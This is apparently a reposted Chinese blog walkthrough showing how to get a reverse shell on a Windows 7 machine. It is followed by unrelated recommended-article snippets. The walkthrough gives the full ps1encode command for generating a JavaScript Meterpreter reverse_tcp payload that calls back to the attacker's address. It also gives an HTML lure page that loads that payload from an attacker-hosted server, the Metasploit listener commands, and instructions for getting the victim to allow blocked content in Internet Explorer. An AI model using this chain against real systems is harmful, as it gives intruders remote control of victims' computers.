利用js文件反弹shell_js反弹shell-程序员宅基地
技术标签: 安全
1.环境
攻击机:Kali 192.168.42.138
靶机:Win7 192.168.42.139
2.安装工具ps1encode
下载地址:https://github.com/CroweCybersecurity/ps1encode
git clone https://github.com/CroweCybersecurity/ps1encode.git
3. 利用js文件反弹shell
先利用ps1encode生成js payload
./ps1encode.rb --LHOST 192.168.42.138 --LPORT 1919 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
将payload复制到文件1.js中,直接执行js文件的话可能比较明显,所以写了一个1.html文件去远程调用js文件执行。
1.html文件内容如下:
<html>
<body>
<img src='http://192.168.42.1/1.jpg'>
<script src='http://192.168.42.1/1.js'></script>
</body>
</html>PS:需要将1.js和1.jsp文件放在同一目录下,开启http服务
Kali开启监听(利用msf监听模块):
msfconsole
msf6 > use /exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.42.138
msf6 exploit(multi/handler) > set lport 1919
msf6 exploit(multi/handler) >run
PS:由于在生成js payload时使用了windows/meterpreter/reverse_tcp模块,因此在设置监听时也需要设置该模块。
将1.html文件复制到靶机,使用ie浏览器打开
选择允许阻止的内容->你想允许这种交互吗(是)
查看靶机,获取shell成功,权限为当前用户权限
智能推荐
动捕捉 easymocap 笔记-程序员宅基地
文章浏览阅读163次。动作捕捉 easymocap 笔记
论文翻译(12)--A Bayesian Model for Crowd Escape Behavior Detection_pets2009数据集-程序员宅基地
文章浏览阅读827次。Association of Heart Rates with Stress Response Inventory Scores in Different Age Groups不同年龄组心率与应激反应量表评分的关系论文地址摘要——许多研究报道心率变化与精神压力有关。最近,设计了一个压力反应问卷(SRI)来对过去两周发生的与精神压力相关的身体、精神和情绪症状进行评分。然而,在手机等移动设备中,性权利倡议有太多的项目需要例行询问。此外,它的个人分数可能对估计不同年龄组的压力水平没有同等的贡献。因此,我们试_pets2009数据集
Leetcode高频题目整理(更新)_t[0,0]走到有下降t[n-1,1],只能向下或者向右走,不能后退-程序员宅基地
文章浏览阅读921次。深度优先遍历篇-69题(Depth-first Search, 69 problems)序号 题号 题目 题目描述 难度 1 679 24 点游戏 你有 4 张写有 1 到 9 数字的牌。你需要判断是否能通过*,/,+,-,(,)的运算得到 24。 困难 2 546 移除盒子 给出一些不同颜色的盒子,盒子的颜色由数字表示,即不同的数字表..._t[0,0]走到有下降t[n-1,1],只能向下或者向右走,不能后退
CSS 样式书写规范_css样式的写法&--seleted::before,-程序员宅基地
文章浏览阅读338次。CSS 样式书写规范编码设置采用 UTF-8 编码,在 CSS 代码头部使用:@charset "utf-8"; 注意,必须要定义在 CSS 文件所有字符的前面(包括编码注释),@charset 才会生效。例如,下面的例子都会使得 @charset 失效:/* 字符编码 */@charset "utf-8";html,body { height: 100%;}@charset "ut_css样式的写法&--seleted::before,
Opencv学习笔记(二)-----常用的处理方法_opencv 图像值为大于255的float时系统会自动做何处理-程序员宅基地
文章浏览阅读235次。opencv常用处理方法: 1.阈值处理2.平滑操作3.形态学变化1.腐蚀和膨胀1.腐蚀和膨胀4.梯度运算5.礼帽与黑帽6.图像梯度-Sobel算子7.三种算子对比_opencv 图像值为大于255的float时系统会自动做何处理
Caddy2 Go开发 高性能 配置简单 HTTPS_caddy 对websockets有-程序员宅基地
文章浏览阅读6.8k次。原文地址:http://i.scwy.net/go/2020/013117-caddy/Caddy是什么?在Caddy的官网上给出一个最简单的介绍:“Caddy是一个能自动创建HTTPS功能的HTTP/2网站服务器”。简单的一句话,突出了两大卖点,“自动创建HTTPS”和“HTTP/2”。caddy致力于成为一个易用的静态文件Web Server。Caddy的作者是来自美国的Matthew..._caddy 对websockets有
随便推点
Eclipse中集成Ant实现快速开发-程序员宅基地
文章浏览阅读400次。 如今Java程序员中很少有人使用命令行方式编程,而越来越多的人习惯使用某种IDE,且大部分选择Eclipse。本文将你展示如何在Eclipse中集成Ant-从在Eclipse中创建工程到编写Ant build.xml文件,再直接从Eclipse中运行这个文件。 Ant是Java开发界领先的构建工具,而Eclipse是主要针对Java程序员的集成开发环境(IDE)。Eclipse在可视化方
2、什么是Nosql/Nosql的特点_noql-程序员宅基地
文章浏览阅读2.2k次。什么是Nosql泛指非关系型数据库的,随着web2.0互联网的诞生!传统的关系型数据库很难对付web2.0时代!尤其是超大规模的高并发的社区!暴露出来很多难以客服的问题,Nosql在当今大数据环境下发展的十分迅速,Redis是发展最快的,而且是我们当下必须要掌握的一个技术!Nosql的特点1、方便扩展(数据之间没有关系,很好扩展)2、大数据量的高性能(Redis 一秒写8万次,读取11万,Nosql的缓存记录级,是一种细粒度的缓存,性能会比较高!3、数据类型是多样型的!(不需要事先设计数_noql
vmware安装打印机(win10)_虚拟机添加主机打印机-程序员宅基地
文章浏览阅读3.7k次。略。_虚拟机添加主机打印机
opencv矩阵转eigen_OpenCV人脸识别Eigen算法源码分析-程序员宅基地
文章浏览阅读98次。1 理论基础学习Eigen人脸识别算法需要了解一下它用到的几个理论基础,现总结如下:1.1 协方差矩阵首先需要了解一下公式:共公式可以看出:均值描述的是样本集合的平均值,而标准差描述的则是样本集合的各个样本点到均值的距离之平均。以一个国家国民收入为例,均值反映了平均收入,而均方差/方差则反映了贫富差距,如果两个国家国民收入均值相等,则标准差越大说明国家的国民收入越不均衡,贫富差距较大。以上公式都是..._opencv使用eigen
Qt程序关于路径、用户目录路径、临时文件夹位置获取方法_qdir::temppath的路径-程序员宅基地
文章浏览阅读1.3k次。Qt程序关于路径、用户目录路径、临时文件夹位置获取方法 比如我们有一个程序在: C:/Qt/examples/tools/regexp/regexp.exe1. 程序所在目录 QString QCoreApplication::applicationDirPath() 那么 qApp->applicationDirPath() 的结果是: 输出:C:/Qt/examples..._qdir::temppath的路径
powerCenter介绍-程序员宅基地
文章浏览阅读1.3w次。powerCenter基础操作_powercenter